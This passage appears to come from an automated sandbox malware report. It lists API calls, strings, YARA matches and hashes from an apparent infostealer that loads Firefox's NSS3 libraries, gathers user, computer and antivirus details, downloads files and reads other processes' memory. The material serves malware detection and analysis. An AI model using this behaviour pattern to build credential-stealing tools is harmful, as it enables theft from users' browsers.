                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C4BB999), ref: 6C4BD02B
                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C4BB999), ref: 6C4BD041
                                                                                                                                                                                          • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C4BB999), ref: 6C60972B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                          • API String ID: 491875419-598938438
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C59536F,00000022,?,?,00000000,?), ref: 6C594E70
                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C594F28
                                                                                                                                                                                          • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C594F8E
                                                                                                                                                                                          • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C594FAE
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C594FC8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                                          • String ID: %s=%c%s%c$%s=%s$oSYl"
                                                                                                                                                                                          • API String ID: 2709355791-1130087531
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • UnDecorator::getArgumentList.LIBCMT ref: 0003F969
                                                                                                                                                                                            • Part of subcall function 0003F504: Replicator::operator[].LIBCMT ref: 0003F587
                                                                                                                                                                                            • Part of subcall function 0003F504: DName::operator+=.LIBCMT ref: 0003F58F
                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 0003F9C2
                                                                                                                                                                                          • DName::DName.LIBCMT ref: 0003FA1A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                                                                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                          • API String ID: 834187326-2211150622
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C56ACE6
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C56AD14
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C56AD23
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C56AD39
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                          • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$ndl
                                                                                                                                                                                          • API String ID: 332880674-1800285468
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • UnDecorator::UScore.LIBCMT ref: 000412E7
                                                                                                                                                                                          • DName::DName.LIBCMT ref: 000412F3
                                                                                                                                                                                            • Part of subcall function 0003EFBE: DName::doPchar.LIBCMT ref: 0003EFEF
                                                                                                                                                                                          • UnDecorator::getScopedName.LIBCMT ref: 00041332
                                                                                                                                                                                          • DName::operator+=.LIBCMT ref: 0004133C
                                                                                                                                                                                          • DName::operator+=.LIBCMT ref: 0004134B
                                                                                                                                                                                          • DName::operator+=.LIBCMT ref: 00041357
                                                                                                                                                                                          • DName::operator+=.LIBCMT ref: 00041364
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                                                                          • String ID: void
                                                                                                                                                                                          • API String ID: 1480779885-3531332078
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00031575
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00031580
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0003158B
                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00031596
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00034098,?,Display Resolution: ,000568F4,00000000,User Name: ,000568E4,00000000,Computer Name: ,000568D0,AV: ,000568C4), ref: 000315A2
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,00034098,?,Display Resolution: ,000568F4,00000000,User Name: ,000568E4,00000000,Computer Name: ,000568D0,AV: ,000568C4,Install Date: ), ref: 000315A9
                                                                                                                                                                                          • wsprintfA.USER32 ref: 000315BB
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                          • String ID: %dx%d
                                                                                                                                                                                          • API String ID: 3940144428-2206825331
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C57CD08
                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6C57CE16
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C57D079
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1351604052-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(13326EFB), ref: 6C532C5D
                                                                                                                                                                                            • Part of subcall function 6C590D30: calloc.MOZGLUE ref: 6C590D50
                                                                                                                                                                                            • Part of subcall function 6C590D30: TlsGetValue.KERNEL32 ref: 6C590D6D
                                                                                                                                                                                          • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C532C8D
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C532CE0
                                                                                                                                                                                            • Part of subcall function 6C532E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C532CDA,?,00000000), ref: 6C532E1E
                                                                                                                                                                                            • Part of subcall function 6C532E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C532E33
                                                                                                                                                                                            • Part of subcall function 6C532E00: TlsGetValue.KERNEL32 ref: 6C532E4E
                                                                                                                                                                                            • Part of subcall function 6C532E00: EnterCriticalSection.KERNEL32(?), ref: 6C532E5E
                                                                                                                                                                                            • Part of subcall function 6C532E00: PL_HashTableLookup.NSS3(?), ref: 6C532E71
                                                                                                                                                                                            • Part of subcall function 6C532E00: PL_HashTableRemove.NSS3(?), ref: 6C532E84
                                                                                                                                                                                            • Part of subcall function 6C532E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C532E96
                                                                                                                                                                                            • Part of subcall function 6C532E00: PR_Unlock.NSS3 ref: 6C532EA9
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C532D23
                                                                                                                                                                                          • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C532D30
                                                                                                                                                                                          • CERT_MakeCANickname.NSS3(00000001), ref: 6C532D3F
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C532D73
                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C532DB8
                                                                                                                                                                                          • free.MOZGLUE ref: 6C532DC8
                                                                                                                                                                                            • Part of subcall function 6C533E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C533EC2
                                                                                                                                                                                            • Part of subcall function 6C533E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C533ED6
                                                                                                                                                                                            • Part of subcall function 6C533E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C533EEE
                                                                                                                                                                                            • Part of subcall function 6C533E60: PR_CallOnce.NSS3(6C692AA4,6C5912D0), ref: 6C533F02
                                                                                                                                                                                            • Part of subcall function 6C533E60: PL_FreeArenaPool.NSS3 ref: 6C533F14
                                                                                                                                                                                            • Part of subcall function 6C533E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C533F27
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AE8
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AEE
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AF4
                                                                                                                                                                                            • Part of subcall function 00024AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00024B06
                                                                                                                                                                                            • Part of subcall function 00024AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00024B0E
                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00026836
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00026856
                                                                                                                                                                                          • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00026877
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00026892
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 000268C8
                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 000268F8
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00026923
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0002692A
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00026936
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 00046634
                                                                                                                                                                                          • _free.LIBCMT ref: 00046642
                                                                                                                                                                                          • _free.LIBCMT ref: 0004664D
                                                                                                                                                                                          • _free.LIBCMT ref: 00046621
                                                                                                                                                                                            • Part of subcall function 0003D93B: HeapFree.KERNEL32(00000000,00000000,?,0003D18F,00000000,0005B6F4,0003D1D6,0002EEBE,?,?,0003D2C0,0005B6F4,?,?,0004EC38,0005B6F4), ref: 0003D951
                                                                                                                                                                                            • Part of subcall function 0003D93B: GetLastError.KERNEL32(?,?,?,0003D2C0,0005B6F4,?,?,0004EC38,0005B6F4,?,?,?), ref: 0003D963
                                                                                                                                                                                          • ___free_lc_time.LIBCMT ref: 0004666B
                                                                                                                                                                                          • _free.LIBCMT ref: 00046676
                                                                                                                                                                                          • _free.LIBCMT ref: 0004669B
                                                                                                                                                                                          • _free.LIBCMT ref: 000466B2
                                                                                                                                                                                          • _free.LIBCMT ref: 000466C1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lc_time
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C41F100: LoadLibraryW.KERNEL32(shell32,?,6C48D020), ref: 6C41F122
                                                                                                                                                                                            • Part of subcall function 6C41F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C41F132
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(00000012), ref: 6C41ED50
                                                                                                                                                                                          • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C41EDAC
                                                                                                                                                                                          • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C41EDCC
                                                                                                                                                                                          • CreateFileW.KERNEL32 ref: 6C41EE08
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C41EE27
                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C41EE32
                                                                                                                                                                                            • Part of subcall function 6C41EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C41EBB5
                                                                                                                                                                                            • Part of subcall function 6C41EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C44D7F3), ref: 6C41EBC3
                                                                                                                                                                                            • Part of subcall function 6C41EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C44D7F3), ref: 6C41EBD6
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C41EDC1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                                          • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0002FBE3,?,00000000,00000000,?,?), ref: 0002F934
                                                                                                                                                                                          • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0002FBE3,?,00000000,00000000), ref: 0002F95E
                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0002F9AB
                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0002FA04
                                                                                                                                                                                          • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0002FA5C
                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0002FBE3,?,00000000,00000000,?,?), ref: 0002FA6D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MemoryProcessQueryReadVirtual
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 3835927879-2766056989
                                                                                                                                                                                          • Opcode ID: b1c22e0f223dfdc82a8042a1b93151b0b54edd3ce86ff795e0293035d4980693
                                                                                                                                                                                          • Instruction ID: 5d4b44bcc27b7e253c19be99d94efc728678dc34ceaf18ea2beb630c9b70784a
                                                                                                                                                                                          • Opcode Fuzzy Hash: b1c22e0f223dfdc82a8042a1b93151b0b54edd3ce86ff795e0293035d4980693
                                                                                                                                                                                          • Instruction Fuzzy Hash: 95419072A0021ABBEF109FA4EC49FEFBBB6FB447A0F148035F905A6190D7748951DB91
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,00000000,?,6C55124D,00000001), ref: 6C548D19
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C55124D,00000001), ref: 6C548D32
                                                                                                                                                                                          • PL_ArenaRelease.NSS3(?,?,?,?,?,6C55124D,00000001), ref: 6C548D73
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C55124D,00000001), ref: 6C548D8C
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: TlsGetValue.KERNEL32 ref: 6C5DDD8C
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5DDDB4
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C55124D,00000001), ref: 6C548DBA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                          • String ID: KRAM$KRAM
                                                                                                                                                                                          • API String ID: 2419422920-169145855
                                                                                                                                                                                          • Opcode ID: ec432111bc49792abc7391e871429a9d8184ac4d89959841b3b672a9e85a4f40
                                                                                                                                                                                          • Instruction ID: dbbe46945a868398d4fdccd268e1d4bf4c6fcbb6c40f1fdc159c3c063f78c71a
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec432111bc49792abc7391e871429a9d8184ac4d89959841b3b672a9e85a4f40
                                                                                                                                                                                          • Instruction Fuzzy Hash: C02148B5A05601DBCB40EF39C88465ABBF0BF85318F15C96AD999C7701EB34E885CBD2
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C44AB89: EnterCriticalSection.KERNEL32(6C49E370,?,?,?,6C4134DE,6C49F6CC,?,?,?,?,?,?,?,6C413284), ref: 6C44AB94
                                                                                                                                                                                            • Part of subcall function 6C44AB89: LeaveCriticalSection.KERNEL32(6C49E370,?,6C4134DE,6C49F6CC,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C44ABD1
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C424A68), ref: 6C45945E
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C459470
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C459482
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C45949F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C45947D
                                                                                                                                                                                          • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C459459
                                                                                                                                                                                          • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C45946B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                                          • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                                          • API String ID: 4042361484-1628757462
                                                                                                                                                                                          • Opcode ID: fbc71ec76c02f5f2e66e9ebd034e0ef4a86cd95b79e67f289c5d52d9a5ff5dcd
                                                                                                                                                                                          • Instruction ID: 4114197cd822658864a69b2999928d09f4de64e0f4701973bea06c8b9878c8dc
                                                                                                                                                                                          • Opcode Fuzzy Hash: fbc71ec76c02f5f2e66e9ebd034e0ef4a86cd95b79e67f289c5d52d9a5ff5dcd
                                                                                                                                                                                          • Instruction Fuzzy Hash: FF01D8B0A051618BEB00EF9CD811E86377AEB36329F14453AED0686B41D732D8768A97
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C604DC3
                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C604DE0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C604DCB
                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C604DDA
                                                                                                                                                                                          • invalid, xrefs: 6C604DB8
                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C604DBD
                                                                                                                                                                                          • misuse, xrefs: 6C604DD5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                          • API String ID: 632333372-2974027950
                                                                                                                                                                                          • Opcode ID: 340023722a912c28371af14dad1a87d0bd45359b2709cf1c55ff0adcc71d4c34
                                                                                                                                                                                          • Instruction ID: c9f059af394520896016fe67bde50f59bb21914b6d6df2e075553996279979ce
                                                                                                                                                                                          • Opcode Fuzzy Hash: 340023722a912c28371af14dad1a87d0bd45359b2709cf1c55ff0adcc71d4c34
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DF0E911F145642BD7105116DE20FE637D59F26319F4609A0FD047BED2D286AC60C6DE
                                                                                                                                                                                          APIs
